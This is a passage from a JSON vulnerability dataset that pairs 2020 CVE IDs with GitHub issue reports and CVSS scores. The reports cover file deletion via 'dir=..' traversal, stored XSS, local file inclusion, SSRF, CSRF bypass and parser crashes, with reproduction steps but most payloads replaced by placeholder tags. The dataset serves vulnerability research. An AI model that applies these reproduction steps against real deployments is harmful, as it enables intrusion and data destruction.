  57503. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/191",
  57504. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/191",
  57505. "Repo_new": "wuzhicms/wuzhicms",
  57506. "Issue_Created_At": "2020-08-25T05:05:34Z",
  57507. "description": "wuzhicms NUMBERTAG Any file deletion vulnerability exists in the background. Any file deletion vulnerability was found in APITAG NUMBERTAG which allows an attacker to delete any other APITAG exploit condition is the login background and Directory overflow. Vulnerable PATHTAG ERRORTAG exploitation of vulnerability NUMBERTAG Enter the directory mode of the extension module FILETAG NUMBERTAG In directory mode, click return to the previous directory FILETAG APITAG parameters by capturing packets APITAG the parameter to \"dir=..\" FILETAG After the directory overflow, more delete options were found than before FILETAG APITAG FILETAG as a APITAG delete FILETAG FILETAG Delete the success! FILETAG NUMBERTAG We discover parameters by APITAG try to change the path to something else FILETAG NUMBERTAG A new FILETAG file was created on disk for the test FILETAG APITAG the parameter to \"URL PATHTAG FILETAG Delete the FILETAG cannot be found. FILETAG The POC is as follows: The path and parameters are determined according to the actual situation URLTAG",
  57508. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  57509. "severity": "HIGH",
  57510. "baseScore": 8.1,
  57511. "impactScore": 5.2,
  57512. "exploitabilityScore": 2.8
  57513. },
  57514. {
  57515. "CVE_ID": "CVE-2020-24939",
  57516. "Issue_Url_old": "https://github.com/stampit-org/supermixer/issues/9",
  57517. "Issue_Url_new": "https://github.com/stampit-org/supermixer/issues/9",
  57518. "Repo_new": "stampit-org/supermixer",
  57519. "Issue_Created_At": "2020-08-20T02:43:31Z",
  57520. "description": "Prototype pollution. I would like to report a Prototype pollution in supermixer, It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation. Vulnerability Description: Prototype Pollution is a vulnerability affecting APITAG Prototype Pollution refers to the ability to inject properties into existing APITAG language construct prototypes, such as objects. Proof of Concept: CODETAG Impact : APITAG Access to restricted data, RCE (depends on implementation)",
  57521. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  57522. "severity": "HIGH",
  57523. "baseScore": 7.5,
  57524. "impactScore": 3.6,
  57525. "exploitabilityScore": 3.9
  57526. },
  57527. {
  57528. "CVE_ID": "CVE-2020-24944",
  57529. "Issue_Url_old": "https://github.com/private-octopus/picoquic/issues/969",
  57530. "Issue_Url_new": "https://github.com/private-octopus/picoquic/issues/969",
  57531. "Repo_new": "private-octopus/picoquic",
  57532. "Issue_Created_At": "2020-07-02T16:25:16Z",
  57533. "description": "Denial of Service vulnerability (infinite loop) while parsing malicious QUIC frame. In picoquic QUIC server maliciously crafted QUIC frame triggers infinite loop while processing. Incorrect logical conditions in APITAG and APITAG leads to infinite loop after processing single packet in epoch NUMBERTAG Attack can be performed remotely without any user interaction and authentication. Proposed CVSS NUMBERTAG score: PATHTAG NUMBERTAG High) (picoquic can be used in embedded environments where infinite loop in one module affects whole system, because there is not pre emptive OS used) Packet that triggers this issue (attached zipped): APITAG To reproduce this issue in full server protocol session needs to be in state epoch NUMBERTAG ulnerable loop is located in function APITAG in picoquic/frames.c lines NUMBERTAG Log of the loop with displayed parameters and variables: APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG stream_id NUMBERTAG offset NUMBERTAG data_length NUMBERTAG fin NUMBERTAG consumed NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG stream_id NUMBERTAG offset NUMBERTAG data_length NUMBERTAG fin NUMBERTAG consumed NUMBERTAG Backtrace from gdb NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG bytes++; (gdb) bt NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n 
NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG b NUMBERTAG in picoquic_parse_stream_header (bytes=bytes APITAG PATHTAG bytes_max=bytes_max APITAG APITAG APITAG APITAG fin=fin APITAG consumed NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG c3f1 in picoquic_decode_stream_frame (cnx=cnx APITAG bytes NUMBERTAG PATHTAG APITAG NUMBERTAG APITAG at PATHTAG NUMBERTAG f NUMBERTAG in picoquic_decode_frames (cnx=cnx APITAG path NUMBERTAG f NUMBERTAG bytes=<optimized out>, bytes APITAG NUMBERTAG APITAG epoch=epoch APITAG APITAG addr_to NUMBERTAG current_time NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in parse_frame_test (buffer NUMBERTAG byte_ma NUMBERTAG at PATHTAG NUMBERTAG fce in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG (gdb) bt full NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG i NUMBERTAG length NUMBERTAG b NUMBERTAG in picoquic_parse_stream_header (bytes=bytes APITAG PATHTAG bytes_max=bytes_max APITAG APITAG APITAG APITAG fin=fin APITAG consumed NUMBERTAG fffffffd NUMBERTAG at PATHTAG ret NUMBERTAG len = <optimized out> off NUMBERTAG length NUMBERTAG l_stream NUMBERTAG l_len NUMBERTAG l_off NUMBERTAG byte_inde NUMBERTAG FUNCTION__ = APITAG NUMBERTAG c3f1 in picoquic_decode_stream_frame (cnx=cnx APITAG bytes NUMBERTAG PATHTAG APITAG NUMBERTAG APITAG at PATHTAG stream_id NUMBERTAG data_length NUMBERTAG offset NUMBERTAG fin NUMBERTAG consumed NUMBERTAG f NUMBERTAG in picoquic_decode_frames (cnx=cnx APITAG path NUMBERTAG f NUMBERTAG bytes=<optimized out>, bytes APITAG NUMBERTAG APITAG epoch=epoch APITAG APITAG addr_to NUMBERTAG current_time NUMBERTAG at PATHTAG first_byte = <optimized out> bytes_ma NUMBERTAG ack_needed = <optimized out> pc = APITAG packet_data = {acked_path NUMBERTAG last_ack_delay NUMBERTAG last_time_stamp_received NUMBERTAG largest_sent_time NUMBERTAG delivered_prior NUMBERTAG 
delivered_time_prior NUMBERTAG delivered_sent_prior NUMBERTAG rs_is_path_limited NUMBERTAG FUNCTION__ = \"picoquic_decode_frames NUMBERTAG f NUMBERTAG in parse_frame_test (buffer NUMBERTAG byte_ma NUMBERTAG at PATHTAG epoch NUMBERTAG ret NUMBERTAG simulated_time NUMBERTAG saddr = {sin_family NUMBERTAG sin_port NUMBERTAG sin_addr = {s_addr NUMBERTAG sin_zero = PATHTAG qclient NUMBERTAG FUNCTION__ = \"parse_frame_test\" t_ret NUMBERTAG cn NUMBERTAG fce in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG result NUMBERTAG Source code snippet to reproduce issue (rest of parameters are based on APITAG from APITAG picoquic_decode_frames(cnx, cnx >path FILETAG",
  57534. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57535. "severity": "HIGH",
  57536. "baseScore": 7.5,
  57537. "impactScore": 3.6,
  57538. "exploitabilityScore": 3.9
  57539. },
  57540. {
  57541. "CVE_ID": "CVE-2020-24949",
  57542. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2312",
  57543. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2312",
  57544. "Repo_new": "php-fusion/PHP-Fusion",
  57545. "Issue_Created_At": "2020-05-04T06:01:50Z",
  57546. "description": "Privilege escalation in php fusion NUMBERTAG Describe the bug Privilege escalation in php fusion NUMBERTAG ia allow authenticated user (not admin) send a crafted request to the server and remote execute command (RCE) which should be executed only by admin. It occurred when allow_php_execution is on. The problem was located in function: FILETAG . To Reproduce Steps to reproduce the behavior: Admin already turns on: Allow PHP Execution NUMBERTAG Login as editor (not admin NUMBERTAG Goto link: URLTAG APITAG Desktop (please complete the following information): OS: Windows NUMBERTAG Browser firefox Version [e.g NUMBERTAG",
  57547. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  57548. "severity": "HIGH",
  57549. "baseScore": 8.8,
  57550. "impactScore": 5.9,
  57551. "exploitabilityScore": 2.8
  57552. },
  57553. {
  57554. "CVE_ID": "CVE-2020-24992",
  57555. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/54",
  57556. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/54",
  57557. "Repo_new": "arterli/cmswing",
  57558. "Issue_Created_At": "2020-08-27T01:36:24Z",
  57559. "description": "Vulnerability Report: APITAG in version NUMBERTAG there are two storage XSS vulnerabilities. The first XSS vulnerability Question and answer module. In the Question supplement function, when inserting a link, fill in \"> APITAG APITAG alert NUMBERTAG APITAG The specific location of the vulnerability is shown in the figure APITAG the submission is approved by the admin user, the vulnerability will be triggered when the administrator opens the content management page. FILETAG FILETAG",
  57560. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  57561. "severity": "MEDIUM",
  57562. "baseScore": 5.4,
  57563. "impactScore": 2.7,
  57564. "exploitabilityScore": 2.3
  57565. },
  57566. {
  57567. "CVE_ID": "CVE-2020-24994",
  57568. "Issue_Url_old": "https://github.com/libass/libass/issues/422",
  57569. "Issue_Url_new": "https://github.com/libass/libass/issues/422",
  57570. "Repo_new": "libass/libass",
  57571. "Issue_Created_At": "2020-08-27T02:18:39Z",
  57572. "description": "stack overflow on APITAG parse_tag. Description A vulnerability was found in function parse_tag in APITAG ,which allow attackers to cause a denial of service or remote code execution via a crafted file. poc URLTAG ERRORTAG",
  57573. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57574. "severity": "HIGH",
  57575. "baseScore": 8.8,
  57576. "impactScore": 5.9,
  57577. "exploitabilityScore": 2.8
  57578. },
  57579. {
  57580. "CVE_ID": "CVE-2020-24994",
  57581. "Issue_Url_old": "https://github.com/libass/libass/issues/423",
  57582. "Issue_Url_new": "https://github.com/libass/libass/issues/423",
  57583. "Repo_new": "libass/libass",
  57584. "Issue_Created_At": "2020-08-29T07:31:47Z",
  57585. "description": "stack overflow on APITAG mystrcmp. Description A vulnerability was found in function mystrcmp in APITAG ,which allow attackers to cause a denial of service or remote code execution via a crafted file. FILETAG FILETAG ERRORTAG",
  57586. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57587. "severity": "HIGH",
  57588. "baseScore": 8.8,
  57589. "impactScore": 5.9,
  57590. "exploitabilityScore": 2.8
  57591. },
  57592. {
  57593. "CVE_ID": "CVE-2020-25016",
  57594. "Issue_Url_old": "https://github.com/kornelski/rust-rgb/issues/35",
  57595. "Issue_Url_new": "https://github.com/kornelski/rust-rgb/issues/35",
  57596. "Repo_new": "kornelski/rust-rgb",
  57597. "Issue_Created_At": "2020-06-14T06:46:08Z",
  57598. "description": "APITAG is unsound. The trait assumes that an arbitrary type APITAG can be viewed (and by your personal higher power even modified!) as a byte slice. That is super unsound. Here's an example of causing UB with it: CODETAG",
  57599. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  57600. "severity": "CRITICAL",
  57601. "baseScore": 9.1,
  57602. "impactScore": 5.2,
  57603. "exploitabilityScore": 3.9
  57604. },
  57605. {
  57606. "CVE_ID": "CVE-2020-25219",
  57607. "Issue_Url_old": "https://github.com/libproxy/libproxy/issues/134",
  57608. "Issue_Url_new": "https://github.com/libproxy/libproxy/issues/134",
  57609. "Repo_new": "libproxy/libproxy",
  57610. "Issue_Created_At": "2020-09-07T17:47:52Z",
  57611. "description": "pac server can trigger unbounded recursion in url.cpp APITAG I found this in APITAG CODETAG Looks like the server that hosts the proxy authconfig file can cause libproxy to overflow the stack by sending an unending stream of characters without a newline. The PAC server should be trusted to not do that, but it's still not good. Normal use with a non malicious server looks like this: CODETAG",
  57612. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57613. "severity": "HIGH",
  57614. "baseScore": 7.5,
  57615. "impactScore": 3.6,
  57616. "exploitabilityScore": 3.9
  57617. },
  57618. {
  57619. "CVE_ID": "CVE-2020-25340",
  57620. "Issue_Url_old": "https://github.com/ntop/nDPI/issues/994",
  57621. "Issue_Url_new": "https://github.com/ntop/ndpi/issues/994",
  57622. "Repo_new": "ntop/ndpi",
  57623. "Issue_Created_At": "2020-08-26T08:51:21Z",
  57624. "description": "Memory leak in APITAG I am using nfstream to detect traffic, and the dissect option is turned on, which means that nfstream will use nDPI to complete this task. But I encountered a memory leak problem during use. Nfstream is developed based on the python language, memory leaks are rarely encountered, so I started to locate the cause. In nfstream, I located the reason for this line of code : FILETAG . In fact, the code calls the APITAG function in nDPI: FILETAG . By comparing the memory release operation in APITAG URLTAG and the prototype of the ndpi_flow_struct structure URLTAG , I think that APITAG has not completely released all the variables in ndpi_flow_struct. I think this may be the root cause of the memory leak.",
  57625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  57626. "severity": "MEDIUM",
  57627. "baseScore": 5.5,
  57628. "impactScore": 3.6,
  57629. "exploitabilityScore": 1.8
  57630. },
  57631. {
  57632. "CVE_ID": "CVE-2020-25394",
  57633. "Issue_Url_old": "https://github.com/mozilo/mozilo2.0/issues/28",
  57634. "Issue_Url_new": "https://github.com/mozilodaseinsteigercms/mozilo2.0/issues/28",
  57635. "Repo_new": "mozilodaseinsteigercms/mozilo2.0",
  57636. "Issue_Created_At": "2020-09-08T04:17:40Z",
  57637. "description": "Cross Site Script Vulnerability on \"content\" in APITAG Admin. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Edit APITAG NUMBERTAG Insert Payload: '> APITAG NUMBERTAG Save NUMBERTAG Click Edit NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots NUMBERTAG Infor APITAG Admin: FILETAG NUMBERTAG Go to APITAG and Edit: FILETAG NUMBERTAG Insert Payload XSS: FILETAG NUMBERTAG SS Alert Message: FILETAG Desktop (please complete the following information): OS: Windows Browser Chrome Version NUMBERTAG APITAG Build NUMBERTAG bit)",
  57638. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  57639. "severity": "MEDIUM",
  57640. "baseScore": 5.4,
  57641. "impactScore": 2.7,
  57642. "exploitabilityScore": 2.3
  57643. },
  57644. {
  57645. "CVE_ID": "CVE-2020-25414",
  57646. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/469",
  57647. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/469",
  57648. "Repo_new": "monstra-cms/monstra",
  57649. "Issue_Created_At": "2020-09-03T13:11:48Z",
  57650. "description": "Monstra NUMBERTAG Local File Inclusion Vulnerability. Brief of this vulnerability There is a local File Inclusion Vulnerability in the CMS, which can be exploited by an attacker to execute PHP code Test Environment APITAG APITAG PHP NUMBERTAG mysql NUMBERTAG Affect version NUMBERTAG payload URLTAG We can create FILETAG In the web directory, the content is APITAG FILETAG FILETAG FILETAG Or we can use Apache logs NUMBERTAG use burpsuite FILETAG NUMBERTAG include log FILETAG FILETAG Reason of This Vulnerability Directly from the get parameter and include this parameter, resulting in a APITAG file\uff1a APITAG ERRORTAG As long as we assign a value to the sn variable and it is not empty, we can skip the first NUMBERTAG if APITAG variable CFG is directly assigned to APITAG and then the include method is executed, resulting in a vulnerability",
  57651. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57652. "severity": "CRITICAL",
  57653. "baseScore": 9.8,
  57654. "impactScore": 5.9,
  57655. "exploitabilityScore": 3.9
  57656. },
  57657. {
  57658. "CVE_ID": "CVE-2020-25422",
  57659. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/2",
  57660. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/2",
  57661. "Repo_new": "r0ck3t1973/xss_payload",
  57662. "Issue_Created_At": "2020-09-01T08:41:16Z",
  57663. "description": "Cross Site Script Vulnerability on APITAG Menu\" in Mara NUMBERTAG Describe the bug / An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Menu\" feature. To Reproduce / Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Insert Payload: APITAG APITAG APITAG Hello world! APITAG APITAG NUMBERTAG Click Test: Alert XSS Message NUMBERTAG Save and go to Admin Panel NUMBERTAG Alert XSS Message / Expected behavior / The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page / Screenshots NUMBERTAG go to PATHTAG FILETAG NUMBERTAG Insert Payload FILETAG NUMBERTAG Click Test: Alert XSS Message FILETAG NUMBERTAG Save and go to Admin Panel NUMBERTAG Alert XSS Message FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All I Hope you fix it ASAP",
  57664. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  57665. "severity": "MEDIUM",
  57666. "baseScore": 5.4,
  57667. "impactScore": 2.7,
  57668. "exploitabilityScore": 2.3
  57669. },
  57670. {
  57671. "CVE_ID": "CVE-2020-25427",
  57672. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1406",
  57673. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1406",
  57674. "Repo_new": "gpac/gpac",
  57675. "Issue_Created_At": "2020-02-08T13:37:09Z",
  57676. "description": "Null pointer dereference in function APITAG Command : APITAG crypt FILETAG $POC out test.mp4 Version : APITAG GPAC version NUMBERTAG re NUMBERTAG g NUMBERTAG a8ef NUMBERTAG master Reproducer file : Reproducer URLTAG GDB : CODETAG",
  57677. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57678. "severity": "MEDIUM",
  57679. "baseScore": 5.5,
  57680. "impactScore": 3.6,
  57681. "exploitabilityScore": 1.8
  57682. },
  57683. {
  57684. "CVE_ID": "CVE-2020-25453",
  57685. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389",
  57686. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/389",
  57687. "Repo_new": "blackcatdevelopment/blackcatcms",
  57688. "Issue_Created_At": "2020-05-30T21:28:59Z",
  57689. "description": "CSRF Bypass. Hi ~ I find a CSRF Bypass Vulnerability ! Version NUMBERTAG Author : Noth(\u6c88\u5f67\u74bf) Step NUMBERTAG go to PATHTAG Step NUMBERTAG Use burpsuite to intercept packets Step NUMBERTAG Generate APITAG ( remove the csrf_token ==> \"\" ) Test Video : URLTAG Bypass the csrf_token to login",
  57690. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57691. "severity": "HIGH",
  57692. "baseScore": 8.8,
  57693. "impactScore": 5.9,
  57694. "exploitabilityScore": 2.8
  57695. },
  57696. {
  57697. "CVE_ID": "CVE-2020-25461",
  57698. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/441",
  57699. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/441",
  57700. "Repo_new": "moddable-opensource/moddable",
  57701. "Issue_Created_At": "2020-09-04T08:08:38Z",
  57702. "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
  57703. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57704. "severity": "HIGH",
  57705. "baseScore": 7.5,
  57706. "impactScore": 3.6,
  57707. "exploitabilityScore": 3.9
  57708. },
  57709. {
  57710. "CVE_ID": "CVE-2020-25462",
  57711. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/432",
  57712. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/432",
  57713. "Repo_new": "moddable-opensource/moddable",
  57714. "Issue_Created_At": "2020-08-31T06:06:23Z",
  57715. "description": "Heap buffer overflow at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version: de NUMBERTAG c NUMBERTAG git hash) build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. Heap buffer overflow at PATHTAG FILETAG FILETAG",
  57716. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57717. "severity": "CRITICAL",
  57718. "baseScore": 9.8,
  57719. "impactScore": 5.9,
  57720. "exploitabilityScore": 3.9
  57721. },
  57722. {
  57723. "CVE_ID": "CVE-2020-25463",
  57724. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/440",
  57725. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/440",
  57726. "Repo_new": "moddable-opensource/moddable",
  57727. "Issue_Created_At": "2020-09-04T08:06:34Z",
  57728. "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
  57729. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57730. "severity": "HIGH",
  57731. "baseScore": 7.5,
  57732. "impactScore": 3.6,
  57733. "exploitabilityScore": 3.9
  57734. },
  57735. {
  57736. "CVE_ID": "CVE-2020-25464",
  57737. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/431",
  57738. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/431",
  57739. "Repo_new": "moddable-opensource/moddable",
  57740. "Issue_Created_At": "2020-08-31T05:55:02Z",
  57741. "description": "Heap buffer overflow at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version: de NUMBERTAG c NUMBERTAG git hash) build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC function APITAG { var a = FILETAG",
  57742. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57743. "severity": "HIGH",
  57744. "baseScore": 7.5,
  57745. "impactScore": 3.6,
  57746. "exploitabilityScore": 3.9
  57747. },
  57748. {
  57749. "CVE_ID": "CVE-2020-25465",
  57750. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/442",
  57751. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/442",
  57752. "Repo_new": "moddable-opensource/moddable",
  57753. "Issue_Created_At": "2020-09-04T08:10:54Z",
  57754. "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
  57755. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57756. "severity": "HIGH",
  57757. "baseScore": 7.5,
  57758. "impactScore": 3.6,
  57759. "exploitabilityScore": 3.9
  57760. },
  57761. {
  57762. "CVE_ID": "CVE-2020-25466",
  57763. "Issue_Url_old": "https://github.com/crmeb/CRMEB/issues/22",
  57764. "Issue_Url_new": "https://github.com/crmeb/crmeb/issues/22",
  57765. "Repo_new": "crmeb/crmeb",
  57766. "Issue_Created_At": "2020-09-07T08:16:41Z",
  57767. "description": "An SSRF vulnerability leads to system access. By looking at the source code, we found a SSRF vulnerability that could read arbitrary files on a remote or local server and save them to a web server. Therefore, malicious users can download the malicious Trojan files to the web server to obtain the permissions of the web server\u3002 analysis\uff1a ERRORTAG The above code is to get the name of the file to download ERRORTAG Since the default value of the $type parameter is NUMBERTAG it will skip the if judgment directly and jump to the else judgment. The readfile method reads the value of the $url parameter and writes it to the output buffer. $content gets the content of the output buffer through the APITAG method. ERRORTAG The rest of the code is to write the contents of the read file to the web server. Recurrence of loopholes NUMBERTAG URLTAG poc: CODETAG FILETAG FILETAG",
  57768. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57769. "severity": "CRITICAL",
  57770. "baseScore": 9.8,
  57771. "impactScore": 5.9,
  57772. "exploitabilityScore": 3.9
  57773. },
  57774. {
  57775. "CVE_ID": "CVE-2020-25467",
  57776. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/163",
  57777. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/163",
  57778. "Repo_new": "ckolivas/lrzip",
  57779. "Issue_Created_At": "2020-08-26T10:22:13Z",
  57780. "description": "segmentation fault in lzo_decompress_buf, stream.c NUMBERTAG Hi, there. There is invalid memory access in lzo_decompress_buf, stream.c NUMBERTAG in the newest branch NUMBERTAG be1ffb. System: ~~~~ APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=xenial APITAG NUMBERTAG LTS\" ~~~~ To reproduce, run: ~~~~ lrzip t poc ~~~~ POC: FILETAG This is the output from the terminal: ~~~~ Decompressing... Segmentation fault ~~~~ This is the trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG a NUMBERTAG bp NUMBERTAG cd NUMBERTAG sp NUMBERTAG f NUMBERTAG afed NUMBERTAG T NUMBERTAG f NUMBERTAG a NUMBERTAG in lzo1x_decompress ( PATHTAG NUMBERTAG faff in lzo_decompress_buf .. APITAG NUMBERTAG faff in ucompthread .. APITAG NUMBERTAG f NUMBERTAG d6b9 in start_thread ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c in clone ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG lzo1x_decompress Thread T1 created by T0 here NUMBERTAG f NUMBERTAG e NUMBERTAG e3 in pthread_create ( PATHTAG NUMBERTAG in create_pthread .. APITAG NUMBERTAG in fill_buffer .. APITAG NUMBERTAG in read_stream .. APITAG NUMBERTAG unknown module NUMBERTAG ABORTING ~~~~",
  57781. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57782. "severity": "MEDIUM",
  57783. "baseScore": 5.5,
  57784. "impactScore": 3.6,
  57785. "exploitabilityScore": 1.8
  57786. },
  57787. {
  57788. "CVE_ID": "CVE-2020-25470",
  57789. "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/256",
  57790. "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/256",
  57791. "Repo_new": "antswordproject/antsword",
  57792. "Issue_Created_At": "2020-08-27T01:59:46Z",
  57793. "description": "RCE Vulnerability in View Site. APITAG Ver NUMBERTAG There is a view site function which will show cookies in UI. FILETAG FILETAG After few tests i got that it can parse html tags. FILETAG So it can also execute javascript/node codes like this. FILETAG (i used base NUMBERTAG encoded command which decodes as APITAG )",
  57794. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  57795. "severity": "MEDIUM",
  57796. "baseScore": 6.1,
  57797. "impactScore": 2.7,
  57798. "exploitabilityScore": 2.8
  57799. },
  57800. {
  57801. "CVE_ID": "CVE-2020-25540",
  57802. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/244",
  57803. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/244",
  57804. "Repo_new": "zoujingli/thinkadmin",
  57805. "Issue_Created_At": "2020-08-27T08:28:52Z",
